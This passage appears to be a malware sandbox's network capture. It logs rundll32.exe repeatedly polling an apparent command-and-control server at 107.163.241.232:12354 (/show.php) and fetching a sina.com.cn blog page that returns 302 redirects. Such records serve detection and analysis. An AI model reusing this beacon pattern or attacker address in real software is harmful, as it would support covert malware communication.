                                              Dec 11, 2024 16:25:54.576371908 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              100192.168.2.451045107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:55.157731056 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              101192.168.2.451050107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:55.284895897 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              102192.168.2.451141107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:56.924770117 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              103192.168.2.451148107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:57.029735088 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              104192.168.2.451149202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:57.031270981 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:58.597588062 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              105192.168.2.451278107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:59.157171965 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              106192.168.2.451284107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:59.275904894 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              107192.168.2.451378107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:00.936731100 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              108192.168.2.451386107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:01.045604944 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              109192.168.2.451387202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:01.045877934 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:02.611855030 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              110192.168.2.451468107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:03.331675053 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              111192.168.2.451478107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:03.447772026 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              112192.168.2.451568107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:04.991905928 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              113192.168.2.451576202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:05.107765913 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:06.663619995 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              114192.168.2.451577107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:05.108432055 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              115192.168.2.451658107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:07.231511116 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              116192.168.2.451666107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:07.348721027 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              117192.168.2.451739107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:09.098010063 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              118192.168.2.451741107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:09.208740950 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              119192.168.2.451742202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:09.211011887 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:10.782651901 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              120192.168.2.452288107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:11.346539021 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              121192.168.2.452374107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:11.462119102 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              122192.168.2.453686107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:13.100939989 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              123192.168.2.453818107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:13.215796947 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              124192.168.2.453820202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:13.216111898 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:14.781997919 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              125192.168.2.455654107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:15.378324986 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              126192.168.2.455673107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:15.689882040 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              127192.168.2.456252107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:17.115521908 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              128192.168.2.456357202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:17.229372978 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:18.799427032 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              129192.168.2.456358107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:17.232209921 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              130192.168.2.457170107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:19.355490923 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              131192.168.2.457220107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:19.481911898 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              132192.168.2.458813107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:21.131328106 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              133192.168.2.458979107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:21.252327919 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              134192.168.2.458981202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:21.252428055 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:22.830583096 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              135192.168.2.460535107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:23.361043930 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              136192.168.2.460620107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:23.484586000 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              137192.168.2.462056202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:24.931222916 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              138192.168.2.462221107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:25.161228895 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              139192.168.2.462240107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:25.276005030 CET184OUTGET /show.php HTTP/1.1
